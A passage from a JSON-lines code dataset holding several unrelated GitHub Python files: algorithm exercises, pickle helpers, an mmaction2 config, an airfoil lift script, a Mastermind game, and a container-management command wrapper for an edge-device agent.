\\\r\nsaveAsTextFile(\"/user/smakireddy/somu/solutions02/inactive_customers\")\r\n\r\n","repo_name":"smakireddy/pyspark","sub_path":"CCA/SampleProblems/ITVersity-Problem 2.py","file_name":"ITVersity-Problem 2.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5003927973","text":"import sys\nsys.stdin = open('input.txt')\n\nN,M = map(int,input().split())\nS = set()\n# check = []\ncount = 0\nfor n in range(N):\n S.add(input())\n\nfor m in range(M):\n str_m = input()\n if str_m in S:\n count += 1\n\nprint(count)\n","repo_name":"sskong777/Algorithm","sub_path":"BaekJoon/etc/14425_문자열집합/14425_문자열집합.py","file_name":"14425_문자열집합.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"74195241682","text":"def binary_search(search_list:[], begin, end, target):\n mid_index = int((begin + end) / 2)\n mid_element = search_list[mid_index]\n if mid_element == target:\n return mid_index\n\n if begin == end or begin+1 == end:\n return -2\n\n if mid_element < target:\n return binary_search(search_list, mid_index, end, target)\n elif mid_element > target:\n return binary_search(search_list, begin, mid_index, target)\n\n\ndef run(user_input=\"\"\"5\n6\n10 20 30 40 50\n40 10 35 15 40 20\"\"\"):\n params = user_input.splitlines()\n search_list = [int(i) for i in params[2].split()]\n search_targets = [int(i) for i in params[3].split()]\n\n search_results = []\n for target in search_targets:\n search_result = binary_search(search_list, 0, len(search_list)-1, target) + 1\n search_results.append(str(search_result))\n\n result = \" \".join(search_results)\n print(result)\n return result\n","repo_name":"denizcetiner/rosalindpractice","sub_path":"BINS.py","file_name":"BINS.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38105262979","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport pickle\n\n\ndef replace_sep(fin, fout, sep_ini, sep_fin):\n \"\"\"\n Replace delimiter in a file.\n \"\"\"\n fin = open(fin, \"r\")\n fout = open(fout, \"w\")\n for line in fin:\n fout.write(line.replace(sep_ini, sep_fin))\n fin.close()\n fout.close()\n\n\ndef remove_quotes(fin, fout):\n \"\"\"\n Remove quotes in lines.\n If a line has odd number quotes, remove all quotes in this line.\n \"\"\"\n fin = open(fin)\n fout = open(fout, \"w\")\n for line in fin:\n fout.write(line.replace(\"\\\"\", \"\"))\n fin.close()\n fout.close()\n\n\ndef pickle_dump_large_file(obj, filepath):\n \"\"\"\n This is a defensive way to write pickle.write,\n allowing for very large files on all platforms\n \"\"\"\n max_bytes = 2**31 - 1\n bytes_out = pickle.dumps(obj)\n n_bytes = sys.getsizeof(bytes_out)\n with open(filepath, 'wb') as f_out:\n for idx in range(0, n_bytes, max_bytes):\n f_out.write(bytes_out[idx:idx + max_bytes])\n\n\ndef pickle_load_large_file(filepath):\n \"\"\"\n This is a defensive way to write pickle.load,\n allowing for very large files on all platforms\n \"\"\"\n max_bytes = 2**31 - 1\n input_size = os.path.getsize(filepath)\n bytes_in = bytearray(0)\n with open(filepath, 'rb') as f_in:\n for _ in range(0, input_size, max_bytes):\n bytes_in += f_in.read(max_bytes)\n obj = pickle.loads(bytes_in)\n return 
obj\n","repo_name":"BangLiu/ArticlePairMatching","sub_path":"src/models/CCIG/util/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":233,"dataset":"github-code","pt":"3"} +{"seq_id":"30513146702","text":"# model settings\npreprocess_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375])\n\ncheckpoint = ('https://download.openmmlab.com/mmclassification/'\n 'v0/mobileone/mobileone-s4_8xb32_in1k_20221110-28d888cb.pth')\nmodel = dict(\n type='Recognizer2D',\n backbone=dict(\n type='MobileOneTSM',\n arch='s4',\n shift_div=8,\n num_segments=8,\n is_shift=True,\n init_cfg=dict(\n type='Pretrained', checkpoint=checkpoint, prefix='backbone')),\n cls_head=dict(\n type='TSMHead',\n num_segments=8,\n num_classes=400,\n in_channels=2048,\n spatial_type='avg',\n consensus=dict(type='AvgConsensus', dim=1),\n dropout_ratio=0.5,\n init_std=0.001,\n is_shift=True,\n average_clips='prob'),\n # model training and testing settings\n data_preprocessor=dict(type='ActionDataPreprocessor', **preprocess_cfg),\n train_cfg=None,\n test_cfg=None)\n","repo_name":"open-mmlab/mmaction2","sub_path":"configs/_base_/models/tsm_mobileone_s4.py","file_name":"tsm_mobileone_s4.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":3560,"dataset":"github-code","pt":"3"} +{"seq_id":"22612767411","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.spatial as sp\n\ncircleRadius = 1.12\ncircleOrigin = -0.1 + 0.22j\n\n\ndef Circle(origin, radius, n=1000):\n thetas = np.linspace(0, 2 * np.pi, n, endpoint=False)\n return origin + radius * np.exp(1j * thetas)\n\n\ndef MakePotential(Gamma, r, U, origin):\n return lambda z: U * (z - origin) + U * r**2 / (\n z - origin) - 1j * Gamma / (2 * np.pi) * np.log(z - origin)\n\n\ndef Joukowski(b):\n return lambda z: z + b**2 / z\n\n\ndef IsInCircle(point, circleCentre, radius):\n return np.where(np.absolute(point - circleCentre) < radius, True, False)\n\n\ndef PotentialData(potential, Nr=2000, lower=-5, upper=5):\n x = np.linspace(lower, upper, Nr)\n y = np.linspace(-(upper - lower), upper - lower, Nr)\n xs, ys = np.meshgrid(x, y)\n Zs = xs + ys * 1j\n Ps = potential(Zs)\n return Zs, Ps\n\n\nu = 1\nrho = 1\ntransformation = Joukowski(1)\ncircle = Circle(circleOrigin, circleRadius)\nwing = transformation(circle)\n\nfor gamma in [-2.72, 5]:\n potential = MakePotential(gamma, circleRadius, u, circleOrigin)\n Zs, data = PotentialData(potential)\n #wing\n transformedZ= transformation(Zs)\n diffxt = np.diff(data, axis=1) / np.diff(transformedZ, axis=1)\n wingpress = rho / 2 * (u**2 - np.absolute(diffxt)**2)\n print(f\"{len(wingpress.flatten())} vs {len(transformedZ[:,:-1].flatten())}\")\n wingtree = sp.KDTree(np.array([(z.real, z.imag)\n for z in transformedZ[:,:-1].flatten()]))\n werrors, wpoints = wingtree.query(\n np.array([(x.real, x.imag) for x in wing]),\n distance_upper_bound=0.1,\n workers=-1)\n winglift = 1j * rho / 2 * sum([\n wingpress.flatten()[i]**2 *\n (transformedZ[:,:-1].flatten()[i + 1] - transformedZ[:,:-1].flatten()[i - 1]) / 2\n for i in wpoints\n ])\n print(winglift)\n plt.scatter(transformedZ[:,:-1].flatten()[wpoints].real,\n transformedZ[:,:-1].flatten()[wpoints].imag)\n plt.show()\n plt.plot(wingpress.flatten()[wpoints])\n plt.show()\n #circle\n diffx = np.diff(data, axis=1) / np.diff(Zs, axis=1)\n cylinderpress = rho / 2 * (u**2 - np.absolute(diffx)**2)\n circletree = 
sp.KDTree(np.array([(z.real, z.imag)\n for z in Zs[:,:-1].flatten()]))\n cerrors, cpoints = circletree.query(\n np.array([(x.real, x.imag) for x in circle]),\n distance_upper_bound=0.1,\n workers=-1)\n circlelift = 1j * rho / 2 * sum([\n cylinderpress.flatten()[i]**2 *\n (Zs[:,:-1].flatten()[i + 1] - Zs[:,:-1].flatten()[i - 1]) / 2\n for i in cpoints\n ])\n print(circlelift)\n plt.plot(Zs[:,:-1].flatten()[cpoints].real,\n Zs[:,:-1].flatten()[cpoints].imag)\n plt.show()\n plt.plot(cylinderpress.flatten()[cpoints])\n plt.show()\n\n","repo_name":"itepastra/stroming-projecten","sub_path":"Project 2/g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11343386252","text":"from string import ascii_uppercase\nfrom random import choice\n\ndef gen_colors(code_size: int) -> str:\n return ascii_uppercase[:code_size]\n\ndef gen_code(code_size: int, colors: str) -> str:\n return \"\".join([choice(colors) for i in range(code_size)])\n\ndef check_guess(guess, code_size, colors) -> bool:\n return len(guess) == code_size and not set(guess) - set(colors)\n\ndef score_guess(code, guess):\n all_good = 0\n color_good = 0\n left_in_code = []\n left_in_guess = []\n for i in range(len(code)):\n if code[i] == guess[i]:\n all_good += 1\n else:\n left_in_code += [code[i]]\n left_in_guess += [guess[i]]\n for i in left_in_guess:\n if i in left_in_code:\n color_good += 1\n left_in_code.remove(i)\n return (all_good, color_good)\n\ndef play_cli(code_size, nb_colors):\n colors = gen_colors(nb_colors)\n code = gen_code(code_size, colors)\n attempt = 0\n print(f\"Possible colors are {colors}\")\n print(f\"Code is size 4\")\n while True:\n guess = input(f\"{attempt} -->\")\n\n if not check_guess(guess, code_size, colors):\n print(\"Wrong size or color !\")\n continue\n\n attempt += 1\n all_good, color_good = score_guess(guess, code)\n \n if all_good == code_size:\n break\n\n print(f\"({all_good}, {color_good})\")\n print(f\"Congrats, you won after {attempt} attempts !\")\n\n\nif __name__ == \"__main__\":\n play_cli(4,6)\n# code_size = 4\n# colors = gen_colors(6)\n# print(gen_code(code_size, colors))\n#\n# assert(check_guess(\"AFDE\", code_size, colors))\n# assert(not check_guess(\"AFDED\", code_size, colors))\n# assert(not check_guess(\"AFDG\", code_size, colors))\n#\n# print(score_guess(\"ABCD\", \"ABCD\"))\n# print(score_guess('AAAA', 'ABCD'))\n# print(score_guess('AADA', 'ABCD'))\n# print(score_guess('ADDA', 'ABCD'))\n# print(score_guess('ADDB', 'ABCD'))","repo_name":"axellink/my-hackinscience-solutions","sub_path":"solutions/66-py-master-mind.py","file_name":"66-py-master-mind.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33960744923","text":"import cavd\nradii = cavd.EffectiveRadCom(\"./icsd_16713.cif\")\nprint(radii)\n\ncavd.BIComputation(filename=\"./icsd_16713.cif\",migrant=\"Li\",rad_flag=True,effective_rad=True,rad_file=None,rad_store_in_vasp=True,minRad=0.2,maxRad=0.8)\ncavd.BIComputation(filename=\"./Li2CO3-LDA.cif\",migrant=\"Li\",rad_flag=False,effective_rad=True,rad_file=None,rad_store_in_vasp=True,minRad=0.2,maxRad=0.8)\n\nRi,Rf,Rif = cavd.ConnValCom(\"./icsd_16713.cif\",\"Li\",True,True,None)\nprint(Ri,Rf,Rif)\nRi1,Rf1,Rif1 = cavd.ConnValCom(\"./Li2CO3-LDA.cif\",\"Li\",False,True,None)\nprint(Ri1,Rf1,Rif1)\n\nconn = 
cavd.ConnValListCom(\"./icsd_16713.cif\",\"Li\",True,True,None)\nconn1 = cavd.ConnValListCom(\"./Li2CO3-LDA.cif\",\"Li\",False,True,None)\nprint(conn)\nprint(conn1)\n\noneD,twoD,threeD = cavd.ConnStatusCom(\"./icsd_16713.cif\",0.4,\"Li\",True,True,None)\noneD1,twoD1,threeD1 = cavd.ConnStatusCom(\"./Li2CO3-LDA.cif\",0.4,\"Li\",False,True,None)\nprint(oneD,twoD,threeD)\nprint(oneD1,twoD1,threeD1)\n\noneD2,twoD2,threeD2 = cavd.ConnStatus(0.4,conn)\noneD3,twoD3,threeD3 = cavd.ConnStatus(0.4,conn1)\nprint(oneD2,twoD2,threeD2)\nprint(oneD3,twoD3,threeD3)\n\ncavd.ChannelCom(\"./icsd_16713.cif\",0.2,\"Li\",True,True,None)\ncavd.ChannelCom(\"./Li2CO3-LDA.cif\",0.2,\"Li\",False,True,None)\n\ncavd.ASACom(\"./icsd_16713.cif\",0.5,1000,\"Li\",True,True,None)\ncavd.ASACom(\"./Li2CO3-LDA.cif\",0.5,1000,\"Li\",False,True,None)\n\ncavd.VoidNetCom(\"./icsd_16713.cif\",\"Li\",True,True,None)\ncavd.VoidNetCom(\"./icsd_16713.cif\",\"Li\",False,True,None)\n#cavd.AllCom(\"./icsd_16713.cif\",0.5,1000,\"Li\",True,True,None,True,0.584,0.876)","repo_name":"shuhebing/cavd","sub_path":"examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"16966629501","text":"# Decimal to binary\n\ndef binary(n) :\n if not n : return 0\n elif n >= 1 : \n binary(n // 2)\n print(n % 2, end = '')\n\nn = int(input(\"Enter a decimal number: \"))\nprint(\"Binary number:\")\nbinary(n)","repo_name":"mre9798/Python_Anlin","sub_path":"Sample Work/Recursive Decimal to Bin.py","file_name":"Recursive Decimal to Bin.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12184188792","text":"from typing import Optional, Tuple\n\nimport logging\nimport pipes\n\nfrom .constants import DOCKER, COMPOSE, TRTL_PATH\nfrom subprocess import Popen, PIPE\nimport shlex\nimport time\n\nfrom inbm_common_lib.shell_runner import PseudoShellRunner\n\nlogger = logging.getLogger(__name__)\n\n\nclass Trtl:\n \"\"\"\n Class for creating/running TRTL shell commands using a boilerplate\n @param runner: PseudoShellRunner object\n @param app_type: application type TRTL should use to execute the command\n @param config_params: configuration values necessary for the command to execute\n \"\"\"\n\n def __init__(self, runner: PseudoShellRunner, app_type: Optional[str] = None, config_params: Optional[str] = None) -> None:\n self.runner = runner\n if app_type is not None:\n self.__app_type = app_type\n else:\n self.__app_type = DOCKER\n\n if config_params is not None:\n self.params = config_params\n else:\n self.params = \"\"\n\n def _boilerplate(self, command: str, **kwargs: str) -> str:\n \"\"\"Construct command template for TRTL\n @param command: TRTL command\n @return: String representing TRTL command\n \"\"\"\n txt = ''\n for k, v in kwargs.items():\n txt += ' -' + k + \"=\" + v\n\n return TRTL_PATH + \" -type=\" + self.__app_type + \" -cmd=\" + command + txt\n\n def stats(self) -> Optional[str]:\n \"\"\"Do stats\n\n @return: code and container usage statistics\n \"\"\"\n logger.debug(\"Trtl.stats()\")\n (output, err, usage) = self.runner.run(self._boilerplate(\"stats\"))\n for line in output.splitlines():\n if \"ContainerStats=\" in line:\n logger.debug(line)\n return line.split('=')[1]\n return err\n\n def image_import(self, url: str, image_name: str) -> Tuple[str, Optional[str], int]:\n \"\"\"Do import\n\n @param url: URL location of the 
image TAR file\n @param image_name: Name and tag to use for image. 'sample-container:2'\n @return: exec_code, is_error, output of trtl command\n \"\"\"\n logging.debug(\"Trtl.import(\" + image_name + \", \" + url + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"import\") + \" -ref=\" + image_name + \" -src=\" + url)\n logging.debug(\n \"Trtl.import results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n return out, err, code\n\n def image_load(self, path: str, image_name: str) -> Tuple[str, Optional[str], int]:\n \"\"\"Do load\n\n @param path: Location of the image tar file\n @param image_name: Name to use for image.\n @return: code, err and version number of image just loaded\n \"\"\"\n logging.debug(\"Trtl.load(\" + path + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"load\") + \" -src=\" + path + \" -ref=\" + image_name)\n logging.debug(\n \"Trtl.load results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n return out, err, code\n\n def snapshot(self, image: str) -> Tuple[str, Optional[str], int]:\n \"\"\"Do snapshot\n\n @param image: Image whose snapshot is to be taken\n @return: output, optional std error, return code\n \"\"\"\n logger.debug(\"Trtl.snapshot(\" + str(image) + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"snapshot\") + \" -in=\" + image + \" -am=true\")\n logging.debug(\"Trtl.snapshot results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return out, err, code\n\n def get_image_by_container_id(self, container_id: str) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL GetImageByContainerID\n\n @param container_id: Container ID\n @return: image id associated with container id\n \"\"\"\n logger.debug(\"Trtl.getimagebycontainerid(\" + str(container_id) + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"getimagebycontainerid\") + \" -id=\" + str(container_id))\n logging.debug(\n \"Trtl.getimagebycontainerid results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return out, err, code\n\n def execute(self, image: str, version: int, opt: bool = False) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL execute\n\n @param image: Image whose snapshot is to be taken\n @param version: Container tag version\n @param opt: flag which specifies if config params need to be passed or not\n @return: Result, error message, error code\n \"\"\"\n command = \"\"\n if opt:\n logger.debug(\"(1/2) Trtl.execute(\" + str(image) + \", \" +\n str(version) + \", ['\" + str(self.params) + \"'])\")\n (out, err, code) = self.runner.run(self._boilerplate(\"exec\") +\n \" -in=\" + image + \" -iv=\" + str(version) +\n \" -opt=['\" + self.params + \"']\")\n if err is None:\n err = \"\"\n logger.debug(\"(2/2) Stdout: [\" + out + \"]\" + \"; stderr: [\" + err +\n \"]; return code: \" + str(code))\n else:\n logger.debug(\"(1/2) Trtl.execute(\" + str(image) +\n \", \" + str(version) + \", [\" + str(command) + \"])\")\n (out, err, code) = self.runner.run(self._boilerplate(\"exec\") +\n \" -in=\" + image + \" -iv=\" + str(version) +\n \" -ec=\" + pipes.quote(command))\n if err is None:\n err = \"\"\n logger.debug(\"(2/2) Stdout: [\" + out + \"]\" + \"; stderr: [\" + err +\n \"]; return code: \" + str(code))\n return out, err, code\n\n def image_pull_public(self, image: str, reference: Optional[str], file_name: Optional[str] = None) \\\n -> Tuple[str, Optional[str], int]:\n \"\"\"Do image pull to public registry\n\n @param image: image name\n @param reference: remote registry from 
which to pull image\n @param file_name: file name\n @return: code, err and version number of image pulled\n \"\"\"\n\n if image and reference:\n reference = reference + \"/\" + image\n elif reference is None:\n reference = image\n\n if self.__app_type == COMPOSE:\n reference = image\n logger.debug(\"Trtl.pull(\" + str(reference) + \")\")\n\n if file_name:\n out, err, code = self.runner.run(\n self._boilerplate(\"pull\") + \" -cf=\" + file_name + \" -ref=\" + reference)\n else:\n out, err, code = self.runner.run(\n self._boilerplate(\"pull\") + \" -ref=\" + reference)\n else:\n logger.debug(\"Trtl.imagepull(\" + str(reference) + \")\")\n out, err, code = self.runner.run(\n self._boilerplate(\"imagepull\") + \" -ref=\" + reference)\n\n logging.debug(\"pull results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return out, err, code\n\n @staticmethod\n def _send_password(cmd: str, password: str) -> Tuple[str, Optional[str], int]:\n\n p = Popen(shlex.split(str(cmd)), stdout=PIPE, stdin=PIPE, stderr=PIPE)\n pwd = bytes(password + '\\n', 'utf-8')\n (out, err) = p.communicate(input=pwd)\n str_out = out.decode(encoding='utf-8', errors='strict')\n str_err = err.decode(encoding='utf-8', errors='strict')\n logger.debug(f\"output: {out!s} error: {err!s}\")\n\n while p.poll() is None:\n time.sleep(0.5)\n\n logger.debug(f\"(2/2) Sending password to TRTL. err={err!s}\")\n return str_out, str_err, p.returncode\n\n def image_pull_private(self, image: str, reference: str, username: str, password: str) -> Tuple[str, Optional[str], int]:\n \"\"\"Do image pull to private registry\n\n @param image: image tag\n @param reference: remote registry from which to pull image\n @param username: username to login to private registry\n @param password: password to login to private registry\n @return: code, err and version number of image pulled\n \"\"\"\n\n if image and reference:\n reference = reference + \"/\" + image\n elif reference is None:\n reference = image\n\n logger.debug(\n \"(1/2) Trtl.imagepull(\" +\n str(reference) +\n \", \" +\n str(username) +\n \")\")\n\n cmd = (\n self._boilerplate(\"imagepull\") +\n \" -ref=\" +\n str(reference) +\n \" -user=\" +\n str(username))\n\n return Trtl._send_password(cmd, password)\n\n def login(self, private_registry: str, username: str, password: str) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL login\n\n @param private_registry: The private docker registry\n @param username: username to login to the docker private registry\n @param password: password to login to docker private registry\n @return: Result, error message, error code\n \"\"\"\n\n logger.debug(\n \"(1/2) Trtl.login(\" +\n str(private_registry) +\n \", \" +\n str(username) +\n \")\")\n\n cmd = (self._boilerplate(\"login\") + \" -user=\" + str(username)\n + \" -svr=\" + str(private_registry))\n\n return Trtl._send_password(cmd, password)\n\n def up(self, image: str, file_name: Optional[str] = None) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL up (docker-compose)\n\n @param image: Image to be created/started/attached\n @param file_name: Custom YML file to load on compose\n @return: Result, error message, error code\n \"\"\"\n\n logger.debug(\"Running Trtl.up\")\n if file_name is None:\n (out, err, code) = self.runner.run(self._boilerplate(\n \"up\") + \" -in=\" + image)\n else:\n (out, err, code) = self.runner.run(self._boilerplate(\n \"up\") + \" -in=\" + image + \" -cf=\" + file_name)\n return out, err, code\n\n def down(self, image: str, file_name: Optional[str] = None) -> Tuple[str, 
Optional[str], int]:\n \"\"\"Do TRTL down (docker-compose)\n\n @param image: Image to be stopped\n @param file_name: File name\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.down(\" + image + \")\")\n if file_name is None:\n out, err, code = self.runner.run(self._boilerplate(\"down\") + \" -in=\" + image)\n else:\n out, err, code = self.runner.run(self._boilerplate(\n \"down\") + \" -in=\" + image + \" -cf=\" + file_name)\n logging.debug(\n \"Trtl.down results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n return out, err, code\n\n def start(self, image: str, version: int, opt: bool = False) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL start\n\n @param image: Image to be started\n @param version: Image version\n @param opt: flag which specifies if config params need to be passed or not\n @return: Result, error message, error code\n \"\"\"\n\n if opt:\n logger.debug(\"(1/2) Trtl.start(\" + str(image) + \", \" + str(\n version) + \", ['\" + str(self.params) + \"'])\")\n (out, err, code) = self.runner.run(self._boilerplate(\"start\") +\n \" -in=\" + image + \" -iv=\" + str(version) +\n \" -opt=['\" + self.params + \"']\")\n if err is None:\n err = \"\"\n logger.debug(\"(2/2) Stdout: [\" + out + \"]\" + \"; stderr: [\" + err +\n \"]; return code: \" + str(code))\n else:\n logger.debug(\"(1/2) Trtl.start(\" + str(image) + \", \" + str(\n version))\n (out, err, code) = self.runner.run(self._boilerplate(\n \"start\") + \" -in=\" + image + \" -iv=\" + str(version))\n if err is None:\n err = \"\"\n logger.debug(\"(2/2) Stdout: [\" + out + \"]\" + \"; stderr: [\" + err +\n \"]; return code: \" + str(code))\n return out, err, code\n\n def rollback(self, in_image: str, in_version: int, out_image: str, out_version: int) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL rollback\n\n @param in_image: Rollback from image\n @param in_version: Rollback from image version\n @param out_image: Rollback to image\n @param out_version: Rollback to image version\n\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.rollback(\" + in_image + \", \" + str(in_version) +\n \", \" + out_image + \", \" + str(out_version) + \")\")\n out, err, code = self.runner.run(self._boilerplate(\"rollback\") +\n \" -in=\" + in_image + \" -iv=\" + str(in_version) +\n \" -sn=\" + out_image + \" -sv=\" +\n str(out_version))\n logging.debug(\"Trtl.rollback results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return out, err, code\n\n def commit(self, image: str, version: int) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL commit\n\n @param image: Image to be committed\n @param version: Image version\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.commit(\" + image + \", \" + str(version) + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"commit\") + \" -in=\" + image + \" -iv=\" + str(version))\n logging.debug(\"Trtl.commit results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return out, err, code\n\n def stop(self, image: str, version: int = -1) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL stop\n\n @param image: Image to be stopped\n @param version: Image version; -1 means no version, 0 means latest\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.stop(\" + image + \", \" + str(version) + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"stop\") + \" -in=\" + image + \" -iv=\" + str(version))\n logging.debug(\n \"Trtl.stop results: 
output={}, err={}, exitcode={}\".format(\n out, err, code))\n return out, err, code\n\n def stop_by_id(self, container_id: str) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL stopByID\n @param container_id: ContainerID to be stopped\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.stopByID(\" + container_id + \")\")\n out, err, code = self.runner.run(\n self._boilerplate(\"stopByID\") + \" -id=\" + container_id)\n logging.debug(\"Trtl.stop_by_id results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return out, err, code\n\n def stop_all(self, image: str) -> Tuple[str, Optional[str], int]:\n \"\"\"\n Do TRTL stopAll\n @param image: Container image to be stopped\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.StopAll(\" + image + \")\")\n out, err, code = self.runner.run(self._boilerplate(\"StopAll\") + \" -in=\" + image)\n logging.debug(\"Trtl.stopAll results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return out, err, code\n\n def image_remove_by_id(self, image_id: str, force: bool = False) -> Tuple[str, Optional[str], int]:\n \"\"\"Do TRTL imageRemoveByID\n @param image_id: ImageID to be removed\n @param force: Force image to be removed even if it has an active container\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.imageRemoveByID(\" + image_id + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"imageRemoveByID\") + \" -id=\" + image_id + \" -f=\" + str(force))\n logging.debug(\n \"Trtl.imageremovebyid results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n return out, err, code\n\n def get_latest_tag(self, image: str) -> Tuple[str, int]:\n \"\"\"Get Latest Tag used for an image.\n\n @param image: Image of which the latest tag should be found\n @return: Latest tag number being used and the command exit code\n \"\"\"\n logger.debug(\"Trtl.getlatesttag(\" + image + \")\")\n (out, err, code) = self.runner.run(self._boilerplate(\"getlatesttag\") +\n \" -in=\" + image)\n logging.debug(\n \"Trtl.getlatesttag results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n return out, code\n\n def remove_old_images(self, image: str) -> Optional[str]:\n \"\"\"Remove old images of the image name specified.\n This looks into the config file for how many old images to keep\n for the image name specified and removes any images older than that number.\n\n @param image: Image name of which the older versions should be deleted\n @return: error if any\n \"\"\"\n if self.__app_type == COMPOSE:\n logger.info(\n \"Removing old images not currently supported when using Compose.\")\n return None\n\n logger.debug(\"Trtl.removeoldimage(\" + image + \")\")\n (out, err, code) = self.runner.run(\n self._boilerplate(\"imagedeleteold\") + \" -in=\" + image)\n logging.debug(\n \"Trtl.removeoldimage results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n if code != 0 and err != '':\n return err\n else:\n return None\n\n def list(self, container_id: Optional[str] = None) -> Tuple[Optional[str], str]:\n \"\"\"Lists all the running containers\n\n @param container_id: Container ID to filter by; lists all containers if omitted\n @return: error if any and the list\n \"\"\"\n if container_id is None:\n container_id = ''\n\n logger.debug(f\"Trtl.list: container_id->{container_id}\")\n out, err, code = self.runner.run(\n self._boilerplate(\"list\") + \" -in=\" + container_id)\n logging.debug(\n \"Trtl.list results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n if code != 0 and err != '':\n 
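# NOTE (editorial comment, not in the upstream trtl.py): on failure list() returns the raw\n # error string with an empty result, i.e. (err, ''); on success it returns (None, out).\n 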
return err, ''\n else:\n return None, out\n\n def image_remove_all(self, image: str, force: bool = False) -> Tuple[str, Optional[str], int]:\n \"\"\"\n Do TRTL Remove All images (e.g. compose images)\n\n @param image: Image to be removed\n @param force: Force image to be removed even if it has an active container\n @return: Result, error message, error code\n \"\"\"\n logger.debug(\"Trtl.imageRemoveAll(\" + image + \")\")\n out, err, code = self.runner.run(self._boilerplate(\n \"ImageRemoveAll\") + \" -in=\" + image + \" -f=\" + str(force))\n logging.debug(\n \"Trtl.imageRemoveAll results: output={}, err={}, exitcode={}\" .format(\n out, err, code))\n return out, err, code\n\n def remove_container(self, container_id: str, force: bool) -> Optional[str]:\n \"\"\"Removes container with the container_id specified\n\n @param container_id: ID of the container to be removed\n @param force: Whether to force removal or not (e.g. of a running container)\n @return: error if any\n \"\"\"\n logger.debug(\"Trtl.containerRemove(\" + container_id + \")\")\n if force:\n (out, err, code) = self.runner.run(self._boilerplate(\n \"containerRemoveByID\" + \" -f\") + \" -id=\" + container_id)\n else:\n (out, err, code) = self.runner.run(self._boilerplate(\n \"containerRemoveByID\") + \" -id=\" + container_id)\n\n logging.debug(\n \"Trtl.containerRemove results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n if code != 0 and err != '':\n return err\n else:\n return None\n\n def single_snapshot(self, desc: str) -> Tuple[str, Optional[str]]:\n \"\"\"Creates a snapper snapshot of type single on BTRFS fs with given description.\n @param desc: Description to use for snapshot\n\n @return: stdout and error if any\n \"\"\"\n logger.debug(\"Trtl.singlesnapshot()\")\n (out, err, code) = self.runner.run(\n self._boilerplate(\"singleSnapshot\", description=desc))\n logging.debug(\n \"Trtl.singlesnapshot results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n if code != 0:\n return out, err\n else:\n return out, ''\n\n def delete_snapshot(self, snapshot: str) -> Tuple[int, Optional[str]]:\n \"\"\"Trtl wrapper to delete a particular snapshot.\n\n @return: code and error if any\n \"\"\"\n logger.debug(\"Trtl.delete_snapshot()\")\n (out, err, code) = self.runner.run(\n self._boilerplate(\"deleteSnapshot\", iv=str(snapshot)))\n logging.debug(\n \"Trtl.delete_snapshot results: output={}, err={}, exitcode={}\".format(\n out, err, code))\n return code, err\n\n def sota_rollback(self, snapshot: str) -> Tuple[int, Optional[str]]:\n \"\"\"Trtl wrapper to perform rollback to a given snapshot.\n\n @return: code and error if any\n \"\"\"\n logger.debug(\"Trtl.rollback()\")\n (out, err, code) = self.runner.run(\n self._boilerplate(\"UndoChange\", sv=str(snapshot)))\n 